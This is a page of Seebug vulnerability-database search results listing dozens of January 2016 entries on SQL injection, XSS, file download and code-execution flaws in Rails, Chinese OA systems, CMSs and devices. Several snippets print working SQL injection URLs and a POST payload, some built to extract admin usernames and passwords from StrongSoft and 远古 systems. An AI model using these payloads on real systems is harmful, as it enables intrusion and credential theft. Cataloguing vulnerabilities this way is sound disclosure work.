Lucene search
K
SeebugRecent

56796 matches found

seebug.org
seebug.org
added 2016/01/27 12:0 a.m.68 views

wizBank®学习管理系统任意文件下载漏洞

wizBank学习管理系统文件下载功能没有对下载的文件名称和类型进行严格检查和过滤,恶意用户可通过构造特殊的路径下载指定的文件。 wizBank学习管理系统的\www\cw\skin1\jsp\download.jsp文件的源代码如下: code 区域 ,从代码可见,没有对下载的文件名称和类型进行严格检查和过滤,恶意用户可通过构造特殊的路径下载指定的文件。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.16 views

Ruby On Rails Paperclip跨站脚本漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.40 views

Ruby on Rails rails-html-sanitizer XSS 漏洞

XSS vulnerability in rails-html-sanitizer There is a XSS vulnerability in Rails::Html::FullSanitizer used by Action View's striptags. This vulnerability has been assigned the CVE identifier CVE-2015-7579. Versions Affected: 1.0.2 Not affected: 1.0.0, 1.0.1 Fixed Versions: 1.0.3 Impact Due to the...

4.3CVSS5.9AI score0.02587EPSS
Exploits1
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.18 views

Ruby on Rails activesupport远程拒绝服务漏洞

Impact Specially crafted XML documents can cause applications to raise a SystemStackError and potentially cause a denial of service attack. This only impacts applications using REXML or JDOM as their XML processor. Other XML processors that Rails supports are not impacted. All users running an...

6.8AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.26 views

Ruby on Rails jquery-ujs和jquery-rails安全绕过漏洞

Impact In the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to " https://attacker.com" note the leading space that will be passed to JQuery, who...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.23 views

Knoica Minolta FTP CWD命令缓冲区溢出漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.40 views

Ruby on Rails Web Console IP 白名单安全模式绕过

IP whitelist bypass in Web Console There is a remote code execution vulnerability in Web Console. This vulnerability has been assigned the CVE identifier CVE-2015-3224. Versions Affected: All Not affected: Environments inaccessible from remote IPs, or without Web Console enabled Fixed Versions:...

4.3CVSS7.1AI score0.44984EPSS
Exploits6
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.19 views

Ruby on Rails ActiveModel::Name远程拒绝服务漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.209 views

Rails Dynamic Render 远程命令执行漏洞 (CVE-2016-0752)

如果你的应用程序使用的动态模版路径 例如: render params:id 那么你的程序将会存在远程代码执行和本地文件包含漏洞. 请把你的 Rails 升级到最新版本, 或者重构你的 controllers。 我们将展示如何在特定环境下使用代码执行和本地包含漏洞去攻击 Ruby on Rails 。 Rails的控制器有包含指定渲染文件的功能,举个例子, 当我们调用 show 方法的时候,如果没有定义其他渲染方法,该框架将会隐藏渲染 show.html.erb 文件。 在绝大多数情况下,开发者会输出不同的格式,例如:文本, JSON, XML 或者其他任何格式,或者查看一个文件,...

5CVSS6.7AI score0.95537EPSS
Exploits12
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.15 views

万户OA办公系统 informationmanager_download.jsp 任意文件下载漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/27 12:0 a.m.21 views

Shadows-IT Designs Local File Inclusion

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.18 views

Mao10CMS user_register.php 添加超级管理员逻辑漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.60 views

phpwind V9.0 /windid/admin.php 验证码绕过漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.21 views

用友u8 CmxItem.php SQL注入

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.23 views

StrongSoft灾害预警系统ReportingDetail.aspx ID参数SQL注入漏洞

注入链接:/Disaster/Reporting/ReportingDetail.aspx 注入参数:ID 【获取数据库版本】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR@@version -- 【管理员账号密码】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.WebSystemUser--...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.28 views

php168 知道模块 /zhidao/user.php?j=question&u SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.32 views

FreeBSD 远程拒绝服务攻击漏洞

0x01 漏洞复现 此漏洞是由于FreeBSD在处理ipv6数据包时,某函数对于数据的检验不严格,导致若传入的ipv6结构体某成员函数为NULL时,在后续函数调用中会触发assert,导致freebsd进入异常处理机制,内核崩溃引发系统重启,下面对此漏洞进行详细分析。 首先对于漏洞环境的搭建我不讲解了,在我的微信公众号上发了一篇文章专门讲解FreeBSD环境的搭建,包括内核调试,vmtools安装等等,环境搭建好之后,通过执行poc.py,发现程序重启,重启过程中,/var/crash下会生成崩溃信息。...

7AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.72 views

泛微E-Office /inc/priv_user_list/priv_xml.php SQL注入漏洞

0x01 框架概述 泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。至今已为超过一万家客户提供方便高效的办公体验. 官方主页: www.weaver.com.cn 主页截图如下。 0x02 漏洞信息 先对系统进行解密。 /inc/privuserlist/privxml.php 大概18行开始 $pararr = explodestpar $REQUEST'par' ; $userpriv = $pararr'userpriv'; ... if $pararr'viewtype' == 0 unset $deptnameutf8...

7AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.27 views

Joomla com_docman 组件路径泄露和本地文件包含漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.22 views

齐博(qibocms) /blog/template/space/file/listbbs.php $TB_pre 参数SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.66 views

TRS WCM parseXMLFile()函数 XXE漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.22 views

StrongSoft灾害预警系统strFieldName参数SQL注入漏洞

注入链接:/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数:strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convertint,@@version 【管理员账号密码】...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.59 views

用友致远A6协同系统messageViewer.jsp三处SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.17 views

phpyun v4.0 api/locoy/model/news.class.php SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.17 views

金融化一卡通系统越权添加管理员

/managerNManager.action http://.../xykcx/managerNManager.action...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.31 views

StrongSoft灾害预警系统 warn/AjaxHandle/AjaxOuterWarnForMerger.ashx DeptID参数SQL注入漏洞

注入链接:/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx 注入参数:DeptID 【获取数据库版本】 /warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=SELECT+@@version+AND+'EcwM'='EcwM 【获取当前数据库】...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.32 views

Huawei VRP telnet 弱口令

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.22 views

Shop7z order_checknoprint.asp id 参数 SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.33 views

1caitong电子采购系统 Company_Show.aspx 参数ID SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.40 views

StrongSoft灾害预警系统 /Report/AjaxHandle/StationChoose/StationSearch.ashx stationName 参数SQL注入漏洞

注入链接:/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=1&stationType='KKK'&sqlWhere= 注入参数:stationName 【获取数据库版本】/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName='+and+1=2++union+all+select+@@version,NULL--&stationType='KKK'&sqlWhere=...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/26 12:0 a.m.91 views

ZTE OLT C200 telnet 弱口令

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.16 views

YouYaX宽字节盲注

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.19 views

Zfsoft OA系统 gwxxbviewhtml.do 任意文件下载漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.18 views

MoMoCMS_v3.1 install/index.php重装系统

MoMoCMSv3.1企业建站系统 Install/index.php里没有进行判断lock,你们能判断一下lock吗? 在install/index.php $document.readyfunction / setup navigation, content boxes, etc... / // validate signup form on keyup and submit var validator = $"loginform".validate rules: dbhost: "required", dbname: "required", dbuser: "required",...

7AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.20 views

远古流媒体系统 GetCaption.ashx注入漏洞

/ADI/portal/GetCaption.ashx?CaptionType=1%27%20and%201%3Dconvert%28int%2C%28char%28116%29%252bchar%28121%29%252bchar%28113%29%252bdbname%28%29%252bCHAR%28116%29%252bCHAR%28121%29%252bCHAR%28113%29%29%29--&AssetID=1&CaptionName=11...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.64 views

易企CMS install/install.php 代码执行

看代码\install\install.php 作用就是安装该cms,然后把install.php改为install.php.bak。由于apache解析问题,改文件还是会解析成php,然后就可以暴力getshell。 数据库连接文件会写到\include\config.inc.php 由于是双引号可直接shell,无限制。...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.38 views

泛微e-cology /web/careerapply/HrmCareerApplyAdd.jsp 文件 careerid 参数SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.16 views

远古流媒体系统 query_user_password_qustion.aspx SQL 注入漏洞

/viewgood/webmedia/portal/queryuserpasswordqustion.aspx?username=1%27%20AND%201%3DCONVERT%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2b@@version%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29%20AND%20%271%27%3D%271...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.16 views

远古流媒体系统 pic_proxy.aspx SQL 注入漏洞

/viewgood/webmedia/portal/picproxy.aspx?id=1%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%2b%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29--&type=2...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.93 views

远古流媒体系统 POST注入漏洞

username=%27%20and%201%3Dconvert%28int%2C%20CHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%2bdbname%28%29%2bCHAR%28116%29%20%2b%20CHAR%28121%29%20%2b%20CHAR%28113%29%29-- URL:http://xxx.com/VIEWGOOD/ADI/portal/UserDataSync.aspx POST:UserGUID=1' and...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.19 views

Joomla! 组件 JE Guestbook v1.0 参数view SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.17 views

KingCMS V9 manage.php 任意用户密码重置漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.28 views

StrongSoft灾害预警系统ContactUpdate.aspx ContactID参数SQL注入漏洞

注入链接:/Duty/MailList/ContactUpdate.aspx 注入参数:ContactID Payload:ContactID=-1+and+1=@@version...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.14 views

YouYaX saveself.html 储存型 xss

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.16 views

Youyax lib/indexaction.php 二次注入

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.18 views

乐知行教务系统 /datacenter/downloadApp/loadAppInfo.do versionType 参数SQL注入漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.16 views

三星(Samsung) SyncThruWeb 2.01.00.26 - SMB散列泄露漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/25 12:0 a.m.25 views

HiShop商城系统 Isv.ashx 直接添加管理员设计缺陷

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/23 12:0 a.m.23 views

TRS init_sysUsers.xml 信息泄漏漏洞

No description provided by source...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2016/01/23 12:0 a.m.20 views

shopnum1 GuidBuyList.aspx SQL注入漏洞

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import requests import re class TestPOCPOCBase: vulID = '' ssvid version = '1.0' author = '烽火戏诸侯' vulDate = ' 2015-06-09'...

7.1AI score
Exploits0
Total number of security vulnerabilities56796